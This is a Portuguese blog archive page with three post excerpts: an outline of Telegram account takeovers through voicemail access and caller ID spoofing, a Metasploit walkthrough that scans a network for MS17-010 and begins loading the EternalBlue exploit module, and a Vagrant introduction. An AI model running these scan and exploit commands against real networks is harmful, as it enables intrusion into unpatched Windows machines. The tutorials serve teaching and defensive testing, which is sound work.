Postagens

Mostrando postagens de Janeiro, 2020

Celular hackeado (Telegram)

PREMISSA: TODO CONTEUDO ABAIXO SERVE APENAS PARA FINS ACADÊMICOS E ENTENDIMENTO DO QUE ACONTECEU COM O "CLONE" DA LINHA. Celular hackeado (Telegram) SIM Swap Operação Spoofing Objetivo Acessar as contas de Telegram das vitimas Procedimento de login 1. numero de telefone que envia um SMS vai acessar o login 2. caso falhe receber uma ligação Acessar as caixas postais das vitimas Ligar para seu próprio numero Caller ID Spoofing ** esse e o cara!!! Camuflagem do remetente --> Manipulação de uma informação dentro da telefonia Caller ID (identificativo de quem esta ligando) Software VOIP Deixar o telefone ocupado DEIXAR CLARO QUE: 1. Falha foi das operadoras (sem senhas) acesso a caixa postal; 2. Telegram das vitimas (não acessou os dados do celular); O que fazer para me proteger? Ativar a autenticação de dois fatores

Varredura na Rede (para detectar o eternalblue)

Olá para darmos continuidade ao ano de 2020, hoje vou demostrar a varredura em sua Rede para detectar o eternalblue. A premissa que vou considerar que você já tem em seu virtualbox é um kali linux atualizado https://www.kali.org/downloads/ Comandos dentro do Kali Linux # service postgresql start # msfconsole msf5 > search smb_ms17_010 msf5 > use auxiliary/scanner/smb/smb_ms17_010 msf5 auxiliary(scanner/smb/smb_ms17_010) > show options msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.0/24 msf5 auxiliary(scanner/smb/smb_ms17_010) > set THREADS 100 msf5 auxiliary(scanner/smb/smb_ms17_010) > run Quando a vulnerabilidade for identificada teremos a saida "Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x86" msf5 auxiliary(scanner/smb/smb_ms17_010) > back msf5 > search ms17_010_eternalblue msf5 > use exploit/windows/smb/ms17_010_eternalblue msf5 exploit(windows/smb/ms17_010_eternal

Conhecendo o Vagrant

Imagem
Olá hoje vamos falar de um assunto muito importante para você sysadmin ou desenvolver que precisa de agilidade. O Vagrant é um projeto que permite virtualizar o ambiente de desenvolvimento de forma simples. Premissa ter um bare metal (VirtualBox, Vmware, Hypervisor) https://www.virtualbox.org/ (é o que eu utilizo no dia a dia) Site Vagrant para Download https://www.vagrantup.com/downloads.html Download pela própria distribuição Linux (de boa preferência eu estou usando o Debian Buster 10) $ sudo apt-get install vagrant -y Vagrant Box (maquinas prontas) Criar um diretório (de sua preferência onde vai criar suas vm's) Para instalar os boxes (Discover Vagrant Boxes) $ vagrant box add centos/7 (com esse comando ele vai instalar o centOS) Após o processo de download da máquina veja a saída do arquivo Listando as maquinas $ vagrant box list Criando a VM (veja a saída do arquivo) $ vagrant init Arquivo de configuração (similar ao dockerfile) $ vim Va